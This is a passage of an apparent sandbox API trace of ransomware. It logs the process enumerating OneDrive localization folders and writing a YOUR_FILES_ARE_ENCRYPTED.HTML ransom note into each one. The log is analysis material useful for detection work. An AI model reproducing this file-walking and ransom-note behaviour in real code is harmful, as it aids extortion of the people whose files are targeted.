ftLastWriteTime.dwLowDateTime=0x50dd3ddb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="yo-ng", cAlternateFileName="")) returned 1 [0114.067] StrStrIW (lpFirst="yo-ng", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.067] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng") returned 81 [0114.067] GetProcessHeap () returned 0x600000 [0114.067] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0114.067] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng" [0114.067] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\*" [0114.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd3ddb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x50dd3ddb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x54c43715, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.068] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd3ddb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x50dd3ddb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x54c43715, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.068] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54c43715, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x54c43715, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x555ccdf4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.068] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.068] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\FileSync.LocalizedResources.dll.mui") returned 117 [0114.068] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.068] lstrlenW (lpString=".mui") returned 4 [0114.068] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.068] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54c43715, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x54c43715, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x555ccdf4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x150c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.068] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.068] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0114.068] GetProcessHeap () returned 0x600000 [0114.068] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\yo-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.085] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.086] CloseHandle (hObject=0x324) returned 1 [0114.086] GetProcessHeap () returned 0x600000 [0114.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.086] GetProcessHeap () returned 0x600000 [0114.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.088] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55bc2d1b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x55bc2d1b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x55bc2d1b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0114.088] StrStrIW (lpFirst="zh-cn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.088] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn") returned 81 [0114.088] GetProcessHeap () returned 0x600000 [0114.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.089] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn" [0114.089] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\*" [0114.089] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55bc2d1b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x55bc2d1b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x58ca2fba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.089] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55bc2d1b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x55bc2d1b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x58ca2fba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.089] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ca2fba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x58ca2fba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5bad473f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xd0c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.089] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.089] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\FileSync.LocalizedResources.dll.mui") returned 117 [0114.089] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.089] lstrlenW (lpString=".mui") returned 4 [0114.090] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.090] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ca2fba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x58ca2fba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5bad473f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xd0c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.090] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.090] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0114.090] GetProcessHeap () returned 0x600000 [0114.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.091] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.092] CloseHandle (hObject=0x324) returned 1 [0114.092] GetProcessHeap () returned 0x600000 [0114.092] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.092] GetProcessHeap () returned 0x600000 [0114.092] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.093] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c07e05b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c07e05b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c07e05b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0114.093] StrStrIW (lpFirst="zh-tw", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.093] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw") returned 81 [0114.093] GetProcessHeap () returned 0x600000 [0114.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.094] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw" [0114.094] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\*" [0114.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c07e05b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c07e05b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c6c0410, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.094] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c07e05b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c07e05b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5c6c0410, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.094] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6c0410, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c6c0410, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d06fe04, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xd2c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.094] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.094] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\FileSync.LocalizedResources.dll.mui") returned 117 [0114.094] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.094] lstrlenW (lpString=".mui") returned 4 [0114.094] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.094] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6c0410, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5c6c0410, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d06fe04, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xd2c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.094] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.094] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0114.094] GetProcessHeap () returned 0x600000 [0114.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.095] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.096] CloseHandle (hObject=0x324) returned 1 [0114.096] GetProcessHeap () returned 0x600000 [0114.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.096] GetProcessHeap () returned 0x600000 [0114.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.097] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d3dd471, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5d3dd471, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5d3dd471, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="zu-za", cAlternateFileName="")) returned 1 [0114.097] StrStrIW (lpFirst="zu-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.097] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za") returned 81 [0114.097] GetProcessHeap () returned 0x600000 [0114.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.098] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za" [0114.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\*" [0114.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d3dd471, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5d3dd471, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x637d9cb5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0114.099] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d3dd471, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5d3dd471, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x637d9cb5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="..", cAlternateFileName="")) returned 1 [0114.099] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637d9cb5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x637d9cb5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x63e1c02f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.099] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.099] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\FileSync.LocalizedResources.dll.mui") returned 117 [0114.099] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.099] lstrlenW (lpString=".mui") returned 4 [0114.099] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.099] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637d9cb5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x637d9cb5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x63e1c02f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0x385835e, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.099] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0114.099] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0114.099] GetProcessHeap () returned 0x600000 [0114.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\zu-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\zu-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.100] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.101] CloseHandle (hObject=0x324) returned 1 [0114.101] GetProcessHeap () returned 0x600000 [0114.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.101] GetProcessHeap () returned 0x600000 [0114.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.101] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d3dd471, ftCreationTime.dwHighDateTime=0x1d70074, 